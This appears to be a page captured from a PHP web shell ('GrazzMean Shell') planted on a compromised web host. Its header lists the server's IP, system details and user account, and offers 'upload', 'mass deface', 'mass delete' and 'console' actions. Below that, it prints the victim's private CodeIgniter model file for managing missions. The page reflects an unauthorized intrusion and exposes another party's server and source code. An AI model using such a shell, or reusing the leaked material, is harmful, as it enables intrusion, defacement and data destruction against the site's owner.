shell bypass 403

GrazzMean Shell

: /home/homesquasz/rh/application/models/ [ drwx---r-x ]
Uname: Linux webm016.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 54.36.31.145
Your Ip: 216.73.216.182
User: homesquasz (91404) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl
upload mass deface mass delete console

name : Mission_model.php 
<?php
/* 
 * Generated by CRUDigniter v3.2 
 * www.crudigniter.com
 */
 
class Mission_model extends CI_Model
{
    function __construct()
    {
        parent::__construct();
    }
    
    /*
     * Get mission by id
     */
    function get_mission($id)
    {
        return $this->db->get_where('mission',array('id'=>$id))->row_array();
    }
        function get_all_mission_by_date($datedebut, $datefin)
    {
        $this->db->order_by("mission.id", "desc");
       
        $this->db->where('creationdate >=',date("Y-m-d",strtotime($datedebut)));
        $this->db->where('creationdate <=',date("Y-m-d",strtotime($datefin)));
        $this->db->order_by("mission.id", "desc");
        $this->db->select("*,users.nom as name,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim , mission.description as description, societe.nom as depart");
        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('users', 'users.id = mission.users_id');
   
        $query = $this->db->get()->result_array();
        return $query;
    } 
     function get_mission_to_pdf($id)
    {
       
        
        $this->db->select("*,(select concat(nom,' ',prenom) from users where users.id= mission.updatedby) as validator ,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim, fonction.libelle as poste, mission.description as motif, societe.nom as depart");

        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('users', 'users.id = mission.users_id');
        $this->db->join('affectation', 'users.id = affectation.users_id');
        $this->db->join('fonction', 'fonction.id = affectation.fonction_id');
        $this->db->where("mission.id",$id);
        $query = $this->db->get()->row_array();
        return $query;
    }
     function get_mission_to_externe($id)
    {
       
        
        $this->db->select("*,(select concat(nom,' ',prenom) from users where users.id= mission.updatedby) as validator ,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim , mission.description as motif, fonction.libelle as poste, societe.nom as depart");
        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('users', 'users.id = mission.users_id');
        $this->db->join('affectation', 'users.id = affectation.users_id');
        $this->db->join('fonction', 'fonction.id = affectation.fonction_id');
        $this->db->where("mission.id",$id);
        $query = $this->db->get()->row_array();
        return $query;
    }
    /*
     * Get all mission count
     */
    function get_all_mission_count()
    {
        $this->db->from('mission');
        return $this->db->count_all_results();
    }
        
    /*
     * Get all mission
     */
    function get_all_mission($params = array(),$role=-1)
    {
        
       
        if($role==0){
            $user= $this->session->userdata("auth");
          
            $this->db->where("users_id",$user["iduser"]);
        }
        if($role==0){
            $user= $this->session->userdata("auth");

            $this->db->where("users_id",$user["iduser"]);
        }
        if($role==1){
            if($params['readException']==false){
            $user= $this->session->userdata("auth");
            $this->load->model('User_model');
            $subusers = $this->User_model->get_all_users_for_responsable($user["iduser"]);
            $criteria ="";
            foreach ($subusers as $key => $value) {
              $criteria.=" users_id=".$value["id"]." or ";
            }
            $criteria.= "users_id=".$user["iduser"];
            $this->db->where($criteria);
            }
        }
         if(isset($params) && !empty($params))
        {
            $this->db->limit($params['limit'], $params['offset']);
        }
        $this->db->order_by("mission.id", "desc");
        $this->db->select("*,users.nom as name,typemission.libelle as typemission,objetmission.libelle as objetmission ,transport.libelle as transport , mission.id as idmission , (select concat(users.nom,' ',users.prenom) from users  where users.id=mission.interim_id) as interim , mission.description as description, societe.nom as depart");
        $this->db->from('mission');
        $this->db->join('typemission', 'typemission.id = mission.typemission_id');
        $this->db->join('objetmission', 'objetmission.id = mission.objetmission_id');
        $this->db->join('transport', 'transport.id = mission.transport_id');
        $this->db->join('societe', 'societe.id = mission.depart_id');
        $this->db->join('users', 'users.id = mission.users_id');
   
        $query = $this->db->get()->result_array();
        return $query;
    }
        
    /*
     * function to add new mission
     */
    function add_mission($params)
    {
        $this->db->insert('mission',$params);
        return $this->db->insert_id();
    }
    
    /*
     * function to update mission
     */
    function update_mission($id,$params)
    {
        $this->db->where('id',$id);
        return $this->db->update('mission',$params);
    }
     function update_etat($id,$etat){
        $user= $this->session->userdata("auth");
        $mission = $this->get_mission($id);
            $this->load->model("User_model");
            $responsable = $this->User_model->get_user_responsable($mission["users_id"]);
            $interim=$this->User_model->get_user_interim($mission["users_id"]);
            if( ( ($user["iduser"] != $mission["users_id"]||($user["iduser"] == $mission["users_id"] && $user["type"]==1 )) &&  ($user["iduser"] == $responsable["id"] || $user["iduser"] == $interim["id"]) ) && (isset($mission["id"]) && ($mission["isupdated"]==0) || $etat==3 )  ){
                $params=array(
                  "etat"=>$etat,
                    "isupdated"=>1,
                    "updatedby"=>$user["iduser"]
                );
                $this->db->where('id',$id);
                return $this->db->update('mission',$params);
            }else{
                return false;
            }
    }
    /*
     * function to delete mission
     */
    function delete_mission($id)
    {
        return $this->db->delete('mission',array('id'=>$id));
    }
    /*
     * Pie Chart  Etat
     */
    function ChartEtat($datedebut=null,$datefin=null)
    {
        $condition = ($datedebut!=null && $datefin!=null)? " and  creationdate>=STR_TO_DATE('".date("Y-m-d",strtotime($datedebut))."', '%Y-%m-%d') and   creationdate<=STR_TO_DATE('".date("Y-m-d",strtotime($datefin))."', '%Y-%m-%d ')":"";
        $etats=array(
            '0'=>array(
                "value"=>$this->db->query("select count(etat) as number from mission where etat=0".$condition)->row_array()["number"], 
                "color"=>"#d2d6de",
                "highlight"=>"#d2d6de",
                "label"=>"En Attente"
            ),
            '1'=>array(
                "value"=>$this->db->query("select count(etat) as number from mission where etat=1".$condition)->row_array()["number"], 
                "color"=>"#00a65a",
                "highlight"=>"#00a65a",
                "label"=>"Confirmé"
            ),
            '2'=>array(
                "value"=>$this->db->query("select count(etat) as number from mission where etat=2".$condition)->row_array()["number"],
                 "color"=>"#f56954",
                 "highlight"=>"#f56954",
                 "label"=>"Rejeté"
             ),
            '3'=>array(
                "value"=>$this->db->query("select count(etat) as number from mission where etat=3".$condition)->row_array()["number"], 
                "color"=>"#f39c12",
                "highlight"=>"#f39c12",
                "label"=>"Annulé"
            ),
        );

        
        return $etats;
    }
}
© 2026 GrazzMean